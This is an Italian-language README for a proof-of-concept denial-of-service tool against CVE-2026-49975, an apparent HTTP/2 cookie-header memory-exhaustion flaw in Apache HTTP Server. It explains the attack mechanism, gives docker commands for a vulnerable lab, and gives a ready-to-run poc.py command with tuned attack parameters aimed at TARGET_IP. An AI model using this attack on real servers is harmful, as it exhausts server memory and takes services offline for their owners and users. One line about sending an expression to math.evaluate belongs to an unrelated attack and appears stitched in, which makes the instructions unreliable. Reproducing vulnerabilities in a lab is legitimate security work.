
HTTP2-Bomb
★ CVE-2026-49975 HTTP/2 Bomb PoC ★
CVE-2026-49975 è una vulnerabilità Denial of Service (DoS) in Apache HTTP Server. La vulnerabilità si verifica nel percorso di gestione delle richieste HTTP/2, dove più campi header
cookiepossono essere uniti senza essere conteggiati correttamente rispetto aLimitRequestFields. Inviando una piccola richiesta HTTP/2 codificata in HPACK che si espande in molti campi headercookie, un attaccante può forzare il server ad allocare ripetutamente memoria durante l'unione degli header Cookie. L'attaccante può quindi utilizzare il controllo di flusso HTTP/2 per ritardare la trasmissione della risposta, mantenendo aperti i flussi interessati e impedendo il rilascio della memoria allocata.
| Categoria | Versione |
|---|
| Vulnerabile | Apache HTTP Server 2.4.17 ≤ versione ≤ 2.4.67 |
| Corretta | Apache HTTP Server 2.4.68 o successiva |
Costruisci ed esegui l'ambiente vulnerabile di Apache HTTP Server.
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975
Dopo aver avviato l'ambiente vulnerabile, segui i passaggi seguenti per riprodurre l'attacco.
docker stats cve-2026-49975
Esempio di output:
CONTAINER ID NAME CPU % MEM USAGE / LIMIT MEM %
xxxxxxxxxxxx cve-2026-49975 0.5% 35.2MiB / 8.0GiB 1.7%
Invia la seguente espressione a math.evaluate (ad esempio, tramite l'input di calcolo dell'applicazione).
python3 poc.py \
--host TARGET_IP \
--port 10081 \
--connections 10 \
--streams 100 \
--refs 4091 \
--initial-window 0 \
--hold 300 \
--drip-interval 2 \
--drip-bytes 1
Verifica che l'utilizzo della memoria del container Apache aumenti e rimanga alto mentre i flussi dell'attacco sono mantenuti aperti.